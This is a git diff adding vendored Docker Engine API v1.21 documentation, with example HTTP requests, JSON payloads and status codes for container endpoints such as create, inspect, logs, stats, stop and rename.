+          "OnBuild" : null,
+          "SecurityOpt" : null
+        },
+        "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5",
+        "NetworkSettings" : {
+          "IPAddress" : "172.17.0.2",
+          "IPPrefixLen" : 16,
+          "MacAddress" : "02:42:ac:11:00:02",
+          "Gateway" : "172.17.42.1",
+          "Bridge" : "docker0",
+          "PortMapping" : null,
+          "Ports" : {}
+        },
+        "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf",
+        "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname",
+        "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts",
+        "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+        "Name" : "/test",
+        "Driver" : "aufs",
+        "ExecDriver" : "native-0.2",
+        "MountLabel" : "",
+        "ProcessLabel" : "",
+        "AppArmorProfile" : "",
+        "RestartCount" : 0,
+        "Mounts" : []
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+## 3. Going further
+
+### 3.1 Inside `docker run`
+
+As an example, the `docker run` command line makes the following API calls:
+
+- Create the container
+
+- If the status code is 404, it means the image doesn't exist:
+    - Try to pull it.
+    - Then, retry to create the container.
+
+- Start the container.
+
+- If you are not in detached mode:
+- Attach to the container, using `logs=1` (to have `stdout` and
+      `stderr` from the container's start) and `stream=1`
+
+- If in detached mode or only `stdin` is attached, display the container's id.
+
+### 3.2 Hijacking
+
+In this version of the API, `/attach`, uses hijacking to transport `stdin`,
+`stdout`, and `stderr` on the same socket.
+
+To hint potential proxies about connection hijacking, Docker client sends
+connection upgrade headers similarly to websocket.
+
+    Upgrade: tcp
+    Connection: Upgrade
+
+When Docker daemon detects the `Upgrade` header, it switches its status code
+from **200 OK** to **101 UPGRADED** and resends the same headers.
+
+
+### 3.3 CORS Requests
+
+To set cross origin requests to the Engine API please give values to
+`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all,
+default or blank means CORS disabled
+
+    $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar"
diff --git a/vendor/github.com/docker/docker/docs/api/v1.21.md b/vendor/github.com/docker/docker/docs/api/v1.21.md
new file mode 100644
index 0000000000..b4f54b7c44
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/api/v1.21.md
@@ -0,0 +1,2969 @@
+---
+title: "Engine API v1.21"
+description: "API Documentation for Docker"
+keywords: "API, Docker, rcli, REST, documentation"
+redirect_from:
+- /engine/reference/api/docker_remote_api_v1.21/
+- /reference/api/docker_remote_api_v1.21/
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## 1. Brief introduction
+
+ - The daemon listens on `unix:///var/run/docker.sock` but you can
+   [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
+ - The API tends to be REST. However, for some complex commands, like `attach`
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+ - When the client API version is newer than the daemon's, these calls return an HTTP
+   `400 Bad Request` error message.
+
+## 2. Endpoints
+
+### 2.1 Containers
+
+#### List containers
+
+`GET /containers/json`
+
+List containers
+
+**Example request**:
+
+    GET /v1.21/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Id": "8dfafdbc3a40",
+                 "Names":["/boring_feynman"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 1",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}],
+                 "Labels": {
+                         "com.example.vendor": "Acme",
+                         "com.example.license": "GPL",
+                         "com.example.version": "1.0"
+                 },
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "9cd87474be90",
+                 "Names":["/coolName"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 222222",
+                 "Created": 1367854155,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         },
+         {
+                 "Id": "3176a2479c92",
+                 "Names":["/sleepy_dog"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 3333333333333333",
+                 "Created": 1367854154,
+                 "Status": "Exit 0",
+                 "Ports":[],
+                 "Labels": {},
+                 "SizeRw":12288,
+                 "SizeRootFs":0
+         },
+         {
+                 "Id": "4cb07b47f9fb",
+                 "Names":["/running_cat"],
+                 "Image": "ubuntu:latest",
+                 "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
+                 "Command": "echo 444444444444444444444444444444444",
+                 "Created": 1367854152,
+                 "Status": "Exit 0",
+                 "Ports": [],
+                 "Labels": {},
+                 "SizeRw": 12288,
+                 "SizeRootFs": 0
+         }
+    ]
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, Show all containers.
+        Only running containers are shown by default (i.e., this defaults to false)
+-   **limit** – Show `limit` last created
+        containers, include non-running ones.
+-   **since** – Show only containers created since Id, include
+        non-running ones.
+-   **before** – Show only containers created before Id, include
+        non-running ones.
+-   **size** – 1/True/true or 0/False/false, Show the containers
+        sizes
+-   **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters:
+  -   `exited=<int>`; -- containers with exit code of  `<int>` ;
+  -   `status=`(`created`|`restarting`|`running`|`paused`|`exited`)
+  -   `label=key` or `label="key=value"` of a container label
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **500** – server error
+
+#### Create a container
+
+`POST /containers/create`
+
+Create a container
+
+**Example request**:
+
+    POST /v1.21/containers/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+           "Hostname": "",
+           "Domainname": "",
+           "User": "",
+           "AttachStdin": false,
+           "AttachStdout": true,
+           "AttachStderr": true,
+           "Tty": false,
+           "OpenStdin": false,
+           "StdinOnce": false,
+           "Env": [
+                   "FOO=bar",
+                   "BAZ=quux"
+           ],
+           "Cmd": [
+                   "date"
+           ],
+           "Entrypoint": null,
+           "Image": "ubuntu",
+           "Labels": {
+                   "com.example.vendor": "Acme",
+                   "com.example.license": "GPL",
+                   "com.example.version": "1.0"
+           },
+           "Volumes": {
+             "/volumes/data": {}
+           },
+           "WorkingDir": "",
+           "NetworkDisabled": false,
+           "MacAddress": "12:34:56:78:9a:bc",
+           "ExposedPorts": {
+                   "22/tcp": {}
+           },
+           "StopSignal": "SIGTERM",
+           "HostConfig": {
+             "Binds": ["/tmp:/tmp"],
+             "Links": ["redis3:redis"],
+             "LxcConf": {"lxc.utsname":"docker"},
+             "Memory": 0,
+             "MemorySwap": 0,
+             "MemoryReservation": 0,
+             "KernelMemory": 0,
+             "CpuShares": 512,
+             "CpuPeriod": 100000,
+             "CpuQuota": 50000,
+             "CpusetCpus": "0,1",
+             "CpusetMems": "0,1",
+             "BlkioWeight": 300,
+             "MemorySwappiness": 60,
+             "OomKillDisable": false,
+             "PidMode": "",
+             "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] },
+             "PublishAllPorts": false,
+             "Privileged": false,
+             "ReadonlyRootfs": false,
+             "Dns": ["8.8.8.8"],
+             "DnsOptions": [""],
+             "DnsSearch": [""],
+             "ExtraHosts": null,
+             "VolumesFrom": ["parent", "other:ro"],
+             "CapAdd": ["NET_ADMIN"],
+             "CapDrop": ["MKNOD"],
+             "GroupAdd": ["newgroup"],
+             "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 },
+             "NetworkMode": "bridge",
+             "Devices": [],
+             "Ulimits": [{}],
+             "LogConfig": { "Type": "json-file", "Config": {} },
+             "SecurityOpt": [],
+             "CgroupParent": "",
+             "VolumeDriver": ""
+          }
+      }
+
+**Example response**:
+
+      HTTP/1.1 201 Created
+      Content-Type: application/json
+
+      {
+           "Id":"e90e34656806",
+           "Warnings":[]
+      }
+
+**JSON parameters**:
+
+-   **Hostname** - A string value containing the hostname to use for the
+      container.
+-   **Domainname** - A string value containing the domain name to use
+      for the container.
+-   **User** - A string value specifying the user inside the container.
+-   **AttachStdin** - Boolean value, attaches to `stdin`.
+-   **AttachStdout** - Boolean value, attaches to `stdout`.
+-   **AttachStderr** - Boolean value, attaches to `stderr`.
+-   **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed.
+-   **OpenStdin** - Boolean value, opens `stdin`,
+-   **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects.
+-   **Env** - A list of environment variables in the form of `["VAR=value", ...]`
+-   **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }`
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Entrypoint** - Set the entry point for the container as a string or an array
+      of strings.
+-   **Image** - A string specifying the image name to use for the container.
+-   **Volumes** - An object mapping mount point paths (strings) inside the
+      container to empty objects.
+-   **WorkingDir** - A string specifying the working directory for commands to
+      run in.
+-   **NetworkDisabled** - Boolean value, when true disables networking for the
+      container
+-   **ExposedPorts** - An object mapping ports to an empty object in the form of:
+      `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
+-   **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default.
+-   **HostConfig**
+    -   **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms:
+           + `host-src:container-dest` to bind-mount a host path into the
+             container. Both `host-src`, and `container-dest` must be an
+             _absolute_ path.
+           + `host-src:container-dest:ro` to make the bind-mount read-only
+             inside the container. Both `host-src`, and `container-dest` must be
+             an _absolute_ path.
+           + `volume-name:container-dest` to bind-mount a volume managed by a
+             volume driver into the container. `container-dest` must be an
+             _absolute_ path.
+           + `volume-name:container-dest:ro` to mount the volume read-only
+             inside the container.  `container-dest` must be an _absolute_ path.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **LxcConf** - LXC specific configurations. These configurations only
+          work when using the `lxc` execution driver.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **MemoryReservation** - Memory soft limit in bytes.
+    -   **KernelMemory** - Kernel memory limit in bytes.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsOptions** - A list of DNS options
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **GroupAdd** - A list of additional groups that the container process will run as
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart, `"unless-stopped"` to restart always except when
+            user has manually stopped the container or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
+          as a custom network's name to which this container should connect to.
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+    -   **VolumeDriver** - Driver that this container users to mount volumes.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.21/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": null,
+			"WorkingDir": "",
+			"StopSignal": "SIGTERM"
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecDriver": "native-0.2",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"BlkioWeight": 0,
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsOptions": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"MemoryReservation": 0,
+			"KernelMemory": 0,
+			"OomKillDisable": false,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}],
+			"VolumeDriver": ""
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"SandboxID": "",
+			"HairpinMode": false,
+			"LinkLocalIPv6Address": "",
+			"LinkLocalIPv6PrefixLen": 0,
+			"Ports": null,
+			"SandboxKey": "",
+			"SecondaryIPAddresses": null,
+			"SecondaryIPv6Addresses": null,
+			"EndpointID": "",
+			"Gateway": "",
+			"GlobalIPv6Address": "",
+			"GlobalIPv6PrefixLen": 0,
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"IPv6Gateway": "",
+			"MacAddress": "",
+			"Networks": {
+				"bridge": {
+					"EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+					"Gateway": "172.17.0.1",
+					"IPAddress": "172.17.0.2",
+					"IPPrefixLen": 16,
+					"IPv6Gateway": "",
+					"GlobalIPv6Address": "",
+					"GlobalIPv6PrefixLen": 0,
+					"MacAddress": "02:42:ac:12:00:02"
+				}
+			}
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z",
+			"Status": "running"
+		},
+		"Mounts": [
+			{
+				"Source": "/data",
+				"Destination": "/data",
+				"Mode": "ro,Z",
+				"RW": false
+			}
+		]
+	}
+
+**Example request, with size information**:
+
+    GET /v1.21/containers/4fa6e0f0c678/json?size=1 HTTP/1.1
+
+**Example response, with size information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+    ....
+    "SizeRw": 0,
+    "SizeRootFs": 972,
+    ....
+    }
+
+**Query parameters**:
+
+-   **size** – 1/True/true or 0/False/false, return container size information. Default is `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.21/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.21/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.21/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.21/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.21/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.21/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "networks": {
+                 "eth0": {
+                     "rx_bytes": 5338,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 36,
+                     "tx_bytes": 648,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 8
+                 },
+                 "eth5": {
+                     "rx_bytes": 4641,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 26,
+                     "tx_bytes": 690,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 9
+                 }
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize`
+
+Resize the TTY for container with  `id`. The unit is number of characters. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.21/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.21/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
